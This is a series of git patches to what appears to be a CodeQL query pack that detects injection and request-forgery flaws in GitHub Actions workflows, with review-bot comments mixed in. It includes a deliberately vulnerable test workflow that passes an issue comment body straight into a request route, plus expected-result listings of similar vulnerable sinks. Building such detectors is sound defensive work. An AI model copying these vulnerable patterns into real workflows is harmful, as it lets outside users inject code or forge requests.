 | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] |
@@ -64,15 +63,10 @@ nodes
 | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced |
 | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files |
 | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files |
-| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title |
-| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log |
 | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body |
 | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body |
 | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body |
 | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title |
-| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body |
-| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body |
-| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title |
 | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body |
 | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body |
 | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body |
@@ -202,14 +196,10 @@ subpaths
 #select
 | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} |
 | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} |
-| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} |
 | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user.
| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} |
 | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} |
 | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} |
 | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} |
-| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user.
| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} |
-| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} |
-| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} |
 | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} |
 | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user.
| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} |
 | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} |
diff --git a/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml
new file mode 100644
index 000000000000..6937467453b2
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml
@@ -0,0 +1,10 @@
+on: issue_comment
+
+jobs:
+ test1:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: octokit/request-action@v2
+ with:
+ route: ${{ github.event.comment.body }}
+
diff --git a/ql/test/query-tests/Security/CWE-918/RequestForgery.expected b/ql/test/query-tests/Security/CWE-918/RequestForgery.expected
new file mode 100644
index 000000000000..d980139bb357
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-918/RequestForgery.expected
@@ -0,0 +1,6 @@
+edges
+nodes
+| .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body |
+subpaths
+#select
+| .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | Potential request forgery in $@, which may be controlled by an external user. | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} |
diff --git a/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref b/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref
new file mode 100644
index 000000000000..fcb4e41daf88
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref
@@ -0,0 +1 @@
+Security/CWE-918/RequestForgery.ql
From 92dbceb5070bc70b09c182385461ba6f7e056592 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 15 Mar 2024 10:19:08 +0100
Subject: [PATCH 121/707] boost pack versions
---
 ql/lib/qlpack.yml | 8 ++++----
 ql/src/qlpack.yml | 2 +-
 2 files changed, 5 insertions(+), 5 deletions(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index a0f348977abb..d211b8fc2baf 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,12 +2,12 @@
 library: true
 warnOnImplicitThis: true
 name: githubsecuritylab/actions-all
-version: 0.0.1
+version: 0.0.2
 dependencies:
- codeql/controlflow: ^0.1.7
- codeql/yaml: "*"
+ codeql/controlflow: "*"
+ codeql/dataflow: "*"
 codeql/util: "*"
- codeql/dataflow: ^0.1.7
+ codeql/yaml: "*"
 dbscheme: yaml.dbscheme
 extractor: yaml
 groups:
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index aff53d45ddeb..61ef9d40ab5f 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: githubsecuritylab/actions-queries
-version: 0.0.1
+version: 0.0.2
 groups:
 - actions
 - queries
From a36ae6a7e2eec938a81ae1a4b54273e81e5b5bea Mon Sep 17 00:00:00 2001
From: Jorge <46056498+jorgectf@users.noreply.github.com>
Date: Fri, 15 Mar 2024 11:07:01 +0100
Subject: [PATCH 122/707] Add `GITHUB_TOKEN`
---
 action.yml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/action.yml b/action.yml
index a294e9814931..f88e3b078509 100644
--- a/action.yml
+++ b/action.yml
@@ -24,6 +24,7 @@ runs:
 - name: Do something with context
 shell: bash
 env:
+ GITHUB_TOKEN: ${{ github.token }}
 GH_TOKEN: ${{ github.token }}
 run: |
 node ${{ github.action_path }}/.github/action/dist/index.js
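Review bot: Loosening `codeql/controlflow` and `codeql/dataflow` from `^0.1.7` to `"*"` in the `dependencies:` map of ql/lib/qlpack.yml lets a future pack resolution pick any published version of the two packs this library's configurations are written against, including a later major with incompatible dataflow APIs, so reproducibility then rests entirely on the lock file. A bounded range for those two entries, e.g. `codeql/controlflow: ^0.1.7` and `codeql/dataflow: ^0.1.7` (or whatever minor the lock file currently records), keeps the manifest self-describing. If `"*"` is deliberate in order to follow the CLI bundle, a comment above `dependencies:` saying so would stop a later contributor from re-tightening it.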
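Review bot: The new `GITHUB_TOKEN` entry in action.yml carries the same `${{ github.token }}` value as the existing `GH_TOKEN`, and nothing in the hunk records why the script needs the token under both names, so a later cleanup could drop the one that is actually consumed. Presumably one name is read by the client bundled in `dist/index.js` and the other by a CLI it shells out to; a comment above the pair such as `# same token under both names: GITHUB_TOKEN for <consumer>, GH_TOKEN for <consumer>` would capture that. The `permissions:` the token runs with are outside the hunk; with the token now reachable under two names it is worth confirming they are the minimum the script needs.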
From 169e57e87499fbe591a0e2f3d088b4ce68f02632 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 15 Mar 2024 11:10:41 +0100
Subject: [PATCH 123/707] Refactor queries
---
 .../actions/security/CodeInjectionQuery.qll | 25 ++
 .../security/CommandInjectionQuery.qll | 22 ++
 .../actions/security/RequestForgeryQuery.qll | 22 ++
 ql/lib/ext/TEST-RW-MODELS.model.yml | 2 +-
 .../Security/CWE-020/CompositeActionsSinks.ql | 12 +-
 .../CWE-020/ReusableWorkflowsSinks.ql | 12 +-
 ql/src/Security/CWE-078/CommandInjection.ql | 24 +-
 .../CWE-078/CriticalCommandInjection.ql | 45 ---
 .../CWE-078/PrivilegedCommandInjection.ql | 29 ++
 ql/src/Security/CWE-094/CodeInjection.ql | 24 +-
 .../Security/CWE-094/CriticalCodeInjection.ql | 47 ---
 .../CWE-094/CriticalExpressionInjection.ql | 48 ---
 .../Security/CWE-094/ExpressionInjection.ql | 42 ---
 .../CWE-094/PrivilegedCodeInjection.ql | 31 ++
 ql/src/Security/CWE-918/RequestForgery.ql | 24 +-
 .../CWE-078/CriticalCommandInjection.qlref | 1 -
 ...ed => PrivilegedCommandInjection.expected} | 2 +-
 .../CWE-078/PrivilegedCommandInjection.qlref | 1 +
 .../Security/CWE-094/CodeInjection.expected | 272 +++++++++++++++++
 .../CWE-094/CriticalCodeInjection.expected | 14 -
 .../CWE-094/CriticalCodeInjection.qlref | 1 -
 .../CWE-094/CriticalExpressionInjection.qlref | 1 -
 .../CWE-094/ExpressionInjection.expected | 276 ------------------
 .../CWE-094/ExpressionInjection.qlref | 1 -
 ...ected => PrivilegedCodeInjection.expected} | 150 +++++-----
 .../CWE-094/PrivilegedCodeInjection.qlref | 1 +
 26 files changed, 501 insertions(+), 628 deletions(-)
 create mode 100644 ql/lib/codeql/actions/security/CodeInjectionQuery.qll
 create mode 100644 ql/lib/codeql/actions/security/CommandInjectionQuery.qll
 create mode 100644 ql/lib/codeql/actions/security/RequestForgeryQuery.qll
 delete mode 100644 ql/src/Security/CWE-078/CriticalCommandInjection.ql
 create mode 100644 ql/src/Security/CWE-078/PrivilegedCommandInjection.ql
 delete mode 100644 ql/src/Security/CWE-094/CriticalCodeInjection.ql
 delete mode 100644
ql/src/Security/CWE-094/CriticalExpressionInjection.ql
 delete mode 100644 ql/src/Security/CWE-094/ExpressionInjection.ql
 create mode 100644 ql/src/Security/CWE-094/PrivilegedCodeInjection.ql
 delete mode 100644 ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref
 rename ql/test/query-tests/Security/CWE-078/{CriticalCommandInjection.expected => PrivilegedCommandInjection.expected} (58%)
 create mode 100644 ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref
 delete mode 100644 ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected
 delete mode 100644 ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref
 delete mode 100644 ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref
 delete mode 100644 ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected
 delete mode 100644 ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref
 rename ql/test/query-tests/Security/CWE-094/{CriticalExpressionInjection.expected => PrivilegedCodeInjection.expected} (70%)
 create mode 100644 ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref
diff --git a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll
new file mode 100644
index 000000000000..c2453cb1652e
--- /dev/null
+++ b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll
@@ -0,0 +1,25 @@
+private import actions
+private import codeql.actions.TaintTracking
+private import codeql.actions.dataflow.ExternalFlow
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.DataFlow
+
+class CodeInjectionSink extends DataFlow::Node {
+ CodeInjectionSink() {
+ exists(Run e | e.getAnScriptExpr() = this.asExpr()) or
+ externallyDefinedSink(this, "code-injection")
+ }
+}
+
+/**
+ * A taint-tracking configuration for unsafe user input
+ * that is used to construct and evaluate a code script.
+ */
+private module CodeInjectionConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink }
+}
+
+/** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */
+module CodeInjectionFlow = TaintTracking::Global;
diff --git a/ql/lib/codeql/actions/security/CommandInjectionQuery.qll b/ql/lib/codeql/actions/security/CommandInjectionQuery.qll
new file mode 100644
index 000000000000..8eda87f1cae5
--- /dev/null
+++ b/ql/lib/codeql/actions/security/CommandInjectionQuery.qll
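Review bot: `CodeInjectionSink` is exported (the sink classes in the command-injection and request-forgery libraries on the next hunks are `private`) but has no QLDoc, so the CWE-020 queries that now import it get no statement of what it matches. A comment above the class such as `/** An expression interpolated into a run: script, or an externally modelled sink of kind "code-injection". */` would close that gap. The externally modelled kind also changes from `expression-injection`, which the deleted CriticalExpressionInjection.ql and the test model file used, to `code-injection`; out-of-tree model rows that still carry the old kind will silently stop matching, so either accept both for a transition, `externallyDefinedSink(this, ["code-injection", "expression-injection"])`, or call the rename out in the pack's release notes.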
@@ -0,0 +1,22 @@
+private import actions
+private import codeql.actions.TaintTracking
+private import codeql.actions.dataflow.ExternalFlow
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.DataFlow
+
+private class CommandInjectionSink extends DataFlow::Node {
+ CommandInjectionSink() { externallyDefinedSink(this, "command-injection") }
+}
+
+/**
+ * A taint-tracking configuration for unsafe user input
+ * that is used to construct and evaluate a system command.
+ */
+private module CommandInjectionConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink }
+}
+
+/** Tracks flow of unsafe user input that is used to construct and evaluate a system command. */
+module CommandInjectionFlow = TaintTracking::Global;
diff --git a/ql/lib/codeql/actions/security/RequestForgeryQuery.qll b/ql/lib/codeql/actions/security/RequestForgeryQuery.qll
new file mode 100644
index 000000000000..80e3d93ee69a
--- /dev/null
+++ b/ql/lib/codeql/actions/security/RequestForgeryQuery.qll
@@ -0,0 +1,22 @@
+private import actions
+private import codeql.actions.TaintTracking
+private import codeql.actions.dataflow.ExternalFlow
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.DataFlow
+
+private class RequestForgerySink extends DataFlow::Node {
+ RequestForgerySink() { externallyDefinedSink(this, "request-forgery") }
+}
+
+/**
+ * A taint-tracking configuration for unsafe user input
+ * that is used to construct and evaluate a system command.
+ */
+private module RequestForgeryConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof RequestForgerySink }
+}
+
+/** Tracks flow of unsafe user input that is used to construct and evaluate a system command. */
+module RequestForgeryFlow = TaintTracking::Global;
diff --git a/ql/lib/ext/TEST-RW-MODELS.model.yml b/ql/lib/ext/TEST-RW-MODELS.model.yml
index 7adbcd5adbd1..44897ef3311e 100644
--- a/ql/lib/ext/TEST-RW-MODELS.model.yml
+++ b/ql/lib/ext/TEST-RW-MODELS.model.yml
@@ -14,4 +14,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["octo-org/sink-repo/.github/workflows/workflow.yml", "*", "input.config-path", "expression-injection"]
+ - ["octo-org/sink-repo/.github/workflows/workflow.yml", "*", "input.config-path", "code-injection"]
diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql
index 0ea0713983d3..54f58e6b63ee 100644
--- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql
+++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql
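Review bot: The QLDoc on `RequestForgeryConfig` and on `RequestForgeryFlow` was copied from the command-injection library and still says the input "is used to construct and evaluate a system command", which is the wrong contract for a request-forgery sink. Replace the two comments with `A taint-tracking configuration for unsafe user input that is used to build the target of an outbound request.` and `Tracks flow of unsafe user input that is used to build the target of an outbound request.`. `RequestForgerySink` is populated only through externally supplied `request-forgery` model rows, so the flow finds nothing unless such rows exist; a one-line comment on the class stating that dependency would help whoever extends the model file in the next hunk.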
@@ -12,24 +12,16 @@
 */
 
 import actions
-import codeql.actions.DataFlow
+import codeql.actions.security.CodeInjectionQuery
 import codeql.actions.TaintTracking
-import codeql.actions.dataflow.FlowSources
 import codeql.actions.dataflow.ExternalFlow
 
-private class ExpressionInjectionSink extends DataFlow::Node {
- ExpressionInjectionSink() {
- exists(Run e | e.getAnScriptExpr() = this.asExpr()) or
- externallyDefinedSink(this, "expression-injection")
- }
-}
-
 private module MyConfig implements DataFlow::ConfigSig {
 predicate isSource(DataFlow::Node source) {
 exists(CompositeAction c | c.getAnInput() = source.asExpr())
 }
 
- predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink }
+ predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink }
 }
 
 module MyFlow = TaintTracking::Global;
diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql
index 31fbc1eaae2a..2dd5bf1cfef5 100644
--- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql
+++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql
@@ -12,24 +12,16 @@
 */
 
 import actions
-import codeql.actions.DataFlow
+import codeql.actions.security.CodeInjectionQuery
 import codeql.actions.TaintTracking
-import codeql.actions.dataflow.FlowSources
 import codeql.actions.dataflow.ExternalFlow
 
-private class ExpressionInjectionSink extends DataFlow::Node {
- ExpressionInjectionSink() {
- exists(Run e | e.getAnScriptExpr() = this.asExpr()) or
- externallyDefinedSink(this, "expression-injection")
- }
-}
-
 private module MyConfig implements DataFlow::ConfigSig {
 predicate isSource(DataFlow::Node source) {
 exists(ReusableWorkflow w | w.getAnInput() = source.asExpr())
 }
 
- predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink }
+ predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink }
 }
 
 module MyFlow = TaintTracking::Global;
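Review bot: `import codeql.actions.dataflow.ExternalFlow` is kept in CompositeActionsSinks.ql although its only visible user, the `externallyDefinedSink` call in the removed `ExpressionInjectionSink` constructor, is gone; the ReusableWorkflowsSinks.ql hunk below has the same leftover. Unless the part of each query outside the hunk still references ExternalFlow, drop the import in both files so the dependency list matches what the query uses. Note also that `DataFlow::ConfigSig` in `MyConfig` now resolves only through the non-private `import codeql.actions.DataFlow` re-exported by CodeInjectionQuery.qll; if that import is ever made private, both queries stop compiling, so keeping a direct `import codeql.actions.DataFlow` here would be the more robust choice.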
diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql
index bdc341e8caf1..826a3b41e380 100644
--- a/ql/src/Security/CWE-078/CommandInjection.ql
+++ b/ql/src/Security/CWE-078/CommandInjection.ql
@@ -13,27 +13,11 @@
 */
 
 import actions
-import codeql.actions.DataFlow
-import codeql.actions.TaintTracking
-import codeql.actions.dataflow.FlowSources
-import codeql.actions.dataflow.ExternalFlow
+import codeql.actions.security.CommandInjectionQuery
+import CommandInjectionFlow::PathGraph
 
-private class CommandInjectionSink extends DataFlow::Node {
- CommandInjectionSink() { externallyDefinedSink(this, "command-injection") }
-}
-
-private module MyConfig implements DataFlow::ConfigSig {
- predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
-
- predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink }
-}
-
-module MyFlow = TaintTracking::Global;
-
-import MyFlow::PathGraph
-
-from MyFlow::PathNode source, MyFlow::PathNode sink
-where MyFlow::flowPath(source, sink)
+from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink
+where CommandInjectionFlow::flowPath(source, sink)
 select sink.getNode(), source, sink,
 "Potential command injection in $@, which may be controlled by an external user.", sink,
 sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-078/CriticalCommandInjection.ql b/ql/src/Security/CWE-078/CriticalCommandInjection.ql
deleted file mode 100644
index dddbd142873f..000000000000
--- a/ql/src/Security/CWE-078/CriticalCommandInjection.ql
+++ /dev/null
@@ -1,45 +0,0 @@
-/**
- * @name Command built from user-controlled sources
- * @description Building a system command from user-controlled sources is vulnerable to insertion of
- * malicious code by the user.
- * @kind path-problem
- * @problem.severity error
- * @security-severity 9
- * @precision high
- * @id actions/critical-command-injection
- * @tags actions
- * security
- * external/cwe/cwe-078
- */
-
-import actions
-import codeql.actions.DataFlow
-import codeql.actions.TaintTracking
-import codeql.actions.dataflow.FlowSources
-import codeql.actions.dataflow.ExternalFlow
-
-private class CommandInjectionSink extends DataFlow::Node {
- CommandInjectionSink() { externallyDefinedSink(this, "command-injection") }
-}
-
-private module MyConfig implements DataFlow::ConfigSig {
- predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
-
- predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink }
-}
-
-module MyFlow = TaintTracking::Global;
-
-import MyFlow::PathGraph
-
-from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w
-where
- MyFlow::flowPath(source, sink) and
- w = source.getNode().asExpr().getEnclosingWorkflow() and
- (
- w instanceof ReusableWorkflow or
- w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
- )
-select sink.getNode(), source, sink,
- "Potential critical command injection in $@, which may be controlled by an external user.", sink,
- sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql
new file mode 100644
index 000000000000..6f66535e6a41
--- /dev/null
+++ b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql
@@ -0,0 +1,29 @@
+/**
+ * @name Command built from user-controlled sources on a privileged context
+ * @description Building a system command from user-controlled sources is vulnerable to insertion of
+ * malicious code by the user.
+ * @kind path-problem
+ * @problem.severity error
+ * @security-severity 9
+ * @precision high
+ * @id actions/privileged-command-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-078
+ */
+
+import actions
+import codeql.actions.security.CommandInjectionQuery
+import CommandInjectionFlow::PathGraph
+
+from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink, Workflow w
+where
+ CommandInjectionFlow::flowPath(source, sink) and
+ w = source.getNode().asExpr().getEnclosingWorkflow() and
+ (
+ w instanceof ReusableWorkflow or
+ w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
+ )
+select sink.getNode(), source, sink,
+ "Potential privileged command injection in $@, which may be controlled by an external user.",
+ sink, sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql
index 3bac9cec348d..f71c178822cb 100644
--- a/ql/src/Security/CWE-094/CodeInjection.ql
+++ b/ql/src/Security/CWE-094/CodeInjection.ql
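Review bot: The `@description` is the same text as the non-privileged command-injection query and never says what "privileged context" means, although the `where` clause defines it precisely: the source's enclosing workflow is a `ReusableWorkflow`, or it declares a trigger event matching the source's `getATriggerEvent()`. A description along the lines of `Building a system command from user-controlled sources in a reusable workflow, or in a workflow triggered by the event the user-controlled context comes from, is vulnerable to insertion of malicious code by the user.` would let a reader tell the two queries apart from the alert text alone. Renaming the `@id` from `actions/critical-command-injection` to `actions/privileged-command-injection` also resets any alert history, dismissals or baselines keyed on the old id; if that is not intended, keep the old id and change only `@name`.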
@@ -15,27 +15,11 @@
 */
 
 import actions
-import codeql.actions.DataFlow
-import codeql.actions.TaintTracking
-import codeql.actions.dataflow.FlowSources
-import codeql.actions.dataflow.ExternalFlow
+import codeql.actions.security.CodeInjectionQuery
+import CodeInjectionFlow::PathGraph
 
-private class CodeInjectionSink extends DataFlow::Node {
- CodeInjectionSink() { externallyDefinedSink(this, "code-injection") }
-}
-
-private module MyConfig implements DataFlow::ConfigSig {
- predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
-
- predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink }
-}
-
-module MyFlow = TaintTracking::Global;
-
-import MyFlow::PathGraph
-
-from MyFlow::PathNode source, MyFlow::PathNode sink
-where MyFlow::flowPath(source, sink)
+from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink
+where CodeInjectionFlow::flowPath(source, sink)
 select sink.getNode(), source, sink,
 "Potential code injection in $@, which may be controlled by an external user.", sink,
 sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-094/CriticalCodeInjection.ql b/ql/src/Security/CWE-094/CriticalCodeInjection.ql
deleted file mode 100644
index 64d8a6e43286..000000000000
--- a/ql/src/Security/CWE-094/CriticalCodeInjection.ql
+++ /dev/null
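Review bot: The sink this query now uses, `CodeInjectionSink` from CodeInjectionQuery.qll, covers every expression in a `run:` script in addition to the externally modelled `code-injection` sinks the removed local class matched, so this query absorbs the deleted ExpressionInjection.ql, yet its QLDoc header (the lines before the hunk) is untouched by the commit. If `@name` and `@description` still describe only modelled sinks, they should mention script interpolation as well, since that is now the bulk of what the query reports; the diffstat moving the expectations from ExpressionInjection.expected to CodeInjection.expected suggests the wider scope is intended.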
@@ -1,47 +0,0 @@
-/**
- * @name Code injection
- * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary
- * code execution.
- * @kind path-problem
- * @problem.severity error
- * @security-severity 9
- * @precision high
- * @id actions/critical-code-injection
- * @tags actions
- * security
- * external/cwe/cwe-094
- * external/cwe/cwe-095
- * external/cwe/cwe-116
- */
-
-import actions
-import codeql.actions.DataFlow
-import codeql.actions.TaintTracking
-import codeql.actions.dataflow.FlowSources
-import codeql.actions.dataflow.ExternalFlow
-
-private class CodeInjectionSink extends DataFlow::Node {
- CodeInjectionSink() { externallyDefinedSink(this, "code-injection") }
-}
-
-private module MyConfig implements DataFlow::ConfigSig {
- predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
-
- predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink }
-}
-
-module MyFlow = TaintTracking::Global;
-
-import MyFlow::PathGraph
-
-from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w
-where
- MyFlow::flowPath(source, sink) and
